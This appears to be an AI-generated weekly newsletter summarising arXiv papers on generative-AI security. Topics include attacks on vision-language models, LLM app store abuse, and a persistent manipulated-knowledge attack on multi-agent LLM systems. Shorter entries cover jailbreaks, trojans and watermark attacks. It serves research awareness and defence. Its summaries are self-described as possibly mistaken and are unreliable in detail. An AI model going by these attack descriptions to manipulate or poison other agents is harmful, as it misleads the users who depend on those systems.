News

Last Week in GAI Security Research - 07/15/24

Highlights from Last Week

😎 A Survey of Attacks on Large Vision-Language Models: Resources, Advances, and Future Trends
🛍 On the (In)Security of LLM App Stores
🦠 Tactics, Techniques, and Procedures (TTPs) in Interpreted Malware: A Zero-Shot Generation with Large Language Models
⚠️ eyeballvul: a future-proof benchmark for vulnerability detection in the wild
🌧 LLMCloudHunter: Harnessing LLMs for Automated Extraction of Detection Rules from Cloud-Based CTI
📰 Flooding Spread of Manipulated Knowledge in LLM-Based Multi-Agent Communities

Partner Content

Codemod is the end-to-end platform for code automation at scale. Save days of work by running recipes to automate framework upgrades

Leverage the AI-powered Codemod Studio for quick and efficient codemod creation, coupled with the opportunity to engage in a vibrant community for sharing and discovering code automations.
Streamline project migrations with seamless one-click dry-runs and easy application of changes, all without the need for deep automation engine knowledge.
Boost large team productivity with advanced enterprise features, including task automation and CI/CD integration, facilitating smooth, large-scale code deployments.

😎 A Survey of Attacks on Large Vision-Language Models: Resources, Advances, and Future Trends (http://arxiv.org/pdf/2407.07403v1.pdf) -

Advancements in Vision-Language Models (LVLMs) have significantly improved multimodal task performance, including text-to-image generation and visual question answering, due to increased data and computational resources.
LVLMs face underexplored security risks such as adversarial, jailbreak, prompt injection, and data poisoning attacks, which exploit the multimodal nature and complex data processing vulnerabilities of these models.
Effective defense strategies against LVLM attacks include real-time monitoring, anomaly detection, adaptive retraining, and employing multi-modal contrastive learning, yet these models remain sensitive to sophisticated adversarial manipulations.

🛍 On the (In)Security of LLM App Stores (http://arxiv.org/pdf/2407.08422v1.pdf)

The study identified 15,146 LLM apps with misleading descriptions, indicating a systemic issue with transparency and potential for abuse within app stores.
A total of 786,036 LLM apps were analyzed across six stores, revealing 15,996 instances of harmful content, including hate speech and extremism, underscoring the urgent need for effective content moderation.
Despite the removal of 5,462 apps due to policy violations, the persistent discovery of 616 apps with exploitable vulnerabilities highlights the challenges in safeguarding users against malicious behaviors.

🦠 Tactics, Techniques, and Procedures (TTPs) in Interpreted Malware: A Zero-Shot Generation with Large Language Models (http://arxiv.org/pdf/2407.08532v1.pdf)

GENTTP leverages large language models (LLMs) to extract Tactics, Techniques, and Procedures (TTPs) from interpreted malware with high accuracy, transforming malware package metadata and code into deceptive TTPs.
19.2% of malware packages share the same TTP, indicating common attack behaviors and objectives among different malicious software within the open-source ecosystems.
A dataset of 5,890 OSS malware packages from three ecosystems (PyPI, NPM, RubyGems) was created, out of which GENTTP extracted 3,700 TTPs, revealing insights into attack vectors and malware behavior patterns.

⚠️ Eyeballvul: a future-proof benchmark for vulnerability detection in the wild (http://arxiv.org/pdf/2407.08708v1.pdf)

The benchmark, named 'eyeballvul', contains over 24,000 vulnerabilities and 6,000 revisions from more than 5,000 repositories, amounting to 55GB of data, aiming to fill the gap of no existing benchmark dataset for security vulnerabilities in codebases.
LLM models have demonstrated significant progress in detecting security vulnerabilities, with improvements in how well they can fit the context of repositories’ source code into their operational windows, with 39% of revisions and 17.7% of vulnerabilities fitting within GPT-4’s 128k token context.
Performance evaluation of long-context models on 'eyeballvul' showcased a range of precision, recall, and F1 scores, with Claude 3 reaching the highest F1 score of 14.1% among tested models, indicating both the challenges and the potential of using LLMs for vulnerability detection.

🌧 LLMCloudHunter: Harnessing LLMs for Automated Extraction of Detection Rules from Cloud-Based CTI (http://arxiv.org/pdf/2407.05194v1.pdf)

LLMCloudHunter demonstrates a 92% precision and 98% recall in extracting API calls from unstructured cloud OSCTI data, utilizing advanced NLP techniques and generating Sigma rule candidates with a validation success rate of 99.18%.
The framework efficiently processes text and images from cloud-related threat intelligence, converting extracted data into operational Sigma rules compatible with SIEM systems, thus enhancing threat detection capabilities in cloud environments.
Ablation studies show crucial components of LLMCloudHunter, such as the Image Analyzer and API Call Extractor, significantly impact the performance, with a notable decrease in precision and recall when these components are omitted.

📰 Flooding Spread of Manipulated Knowledge in LLM-Based Multi-Agent Communities (http://arxiv.org/pdf/2407.07791v1.pdf)

A two-stage attack strategy effectively manipulates the spread of knowledge in LLM multi-agent communities, highlighting vulnerabilities in security and the need for defenses.
The attack persists across dialogue turns, with manipulated knowledge being stored and retrieved for continued influence on future interactions, underscoring the long-term risk to LLM systems.
Counterfactual and toxic knowledge spread experiments demonstrate a substantial risk, with a notable decrease in the spread success attributed to the agents' discernment capabilities.

Other Interesting Research

Jailbreak Attacks and Defenses Against Large Language Models: A Survey (http://arxiv.org/pdf/2407.04295v1.pdf) - Jailbreak attacks and their defenses are critical areas of research for securing Large Language Models against malicious exploitation and ensuring their safe operation.
T2VSafetyBench: Evaluating the Safety of Text-to-Video Generative Models (http://arxiv.org/pdf/2407.05965v1.pdf) - T2VSafetyBench offers critical insights into the safety challenges of text-to-video generation, revealing the crucial trade-offs between model usability and content safety.
Are Large Language Models Really Bias-Free? Jailbreak Prompts for Assessing Adversarial Robustness to Bias Elicitation (http://arxiv.org/pdf/2407.08441v1.pdf) - LLMs exhibit varying levels of vulnerability to bias elicitation and require multifaceted mitigation strategies to adhere to ethical standards and social responsibilities in AI technologies.
On Evaluating The Performance of Watermarked Machine-Generated Texts Under Adversarial Attacks (http://arxiv.org/pdf/2407.04794v1.pdf) - Despite high text quality retention, exponential watermark schemes are vulnerable; pre-text schemes disrupt fluency less, indicating ongoing vulnerabilities and the need for more resilient solutions.
Waterfall: Framework for Robust and Scalable Text Watermarking (http://arxiv.org/pdf/2407.04411v1.pdf) - WATERFALL's innovative use of language model paraphrasers and novel watermarking techniques establishes a new standard for robust, scalable, and computationally efficient text watermarking, catering to a broad spectrum of text types and applications.
If You Don't Understand It, Don't Use It: Eliminating Trojans with Filters Between Layers (http://arxiv.org/pdf/2407.06411v1.pdf) - Tailored filters and strategic interventions in LLM architecture show promise in mitigating and unlearning trojan behaviors, highlighting the complexity and potential in defending against data poisoning.
R^2-Guard: Robust Reasoning Enabled LLM Guardrail via Knowledge-Enhanced Logical Reasoning (http://arxiv.org/pdf/2407.05557v1.pdf) - R2-Guard offers a leap in guardrail model capabilities for LLMs by efficiently blending knowledge-based reasoning with data-driven insights, markedly enhancing safety and adaptability.
Controlling Whisper: Universal Acoustic Adversarial Attacks to Control Speech Foundation Models (http://arxiv.org/pdf/2407.04482v1.pdf) - Adversarial attacks can effectively manipulate the operational mode of multi-task ASR models like Whisper, indicating significant security vulnerabilities in flexible, speech-enabled systems.
Generation and De-Identification of Indian Clinical Discharge Summaries using LLMs (http://arxiv.org/pdf/2407.05887v1.pdf) - Large Language Models enhance de-identification of clinical summaries, yet struggle with cross-institutional application, highlighting the significance of synthetic data for training robust privacy-preserving systems.
KG-FPQ: Evaluating Factuality Hallucination in LLMs with Knowledge Graph-based False Premise Questions (http://arxiv.org/pdf/2407.05868v1.pdf) - A novel benchmark and automated evaluation tool reveal critical insights into the vulnerabilities of LLMs to factuality hallucinations induced by false premises, offering actionable pathways for enhancing model reliability in factual knowledge representation.
Exposing Privacy Gaps: Membership Inference Attack on Preference Data for LLM Alignment (http://arxiv.org/pdf/2407.06443v1.pdf) - Research highlights significant privacy risks in LLMs trained with Direct Preference Optimization due to increased vulnerability to Membership Inference Attacks, especially in larger models, emphasizing the need for robust privacy-preserving strategies.
Safe-Embed: Unveiling the Safety-Critical Knowledge of Sentence Encoders (http://arxiv.org/pdf/2407.06851v1.pdf) - This study illuminates the intricacies of leveraging sentence encoders for distinguishing between safe and unsafe prompts, presenting pioneering datasets and metrics to bolster language model safety.
OffsetBias: Leveraging Debiased Data for Tuning Evaluators (http://arxiv.org/pdf/2407.06551v1.pdf) - Judge models trained with bias-aware datasets show marked performance improvements and increased resilience to adversarial and complex inputs by effectively mitigating common evaluation biases.

Strengthen Your Professional Network

In the ever-evolving landscape of cybersecurity, knowledge is not just power—it's protection. If you've found value in the insights and analyses shared within this newsletter, consider this an opportunity to strengthen your network by sharing it with peers. Encourage them to subscribe for cutting-edge insights into generative AI.

🎯

This post was generated using generative AI (OpenAI GPT-4T). Specific approaches were taken to reduce fabrications. As with any AI-generated content, mistakes might be present. Sources for all content have been included for reference.

Last Week in GAI Security Research - 07/15/24

Highlights from Last Week

Partner Content

Other Interesting Research

Strengthen Your Professional Network

Read next

Last Week in GAI Security Research - 11/18/24

Hire an AI Strategist in Security

Last Week in GAI Security Research - 10/07/24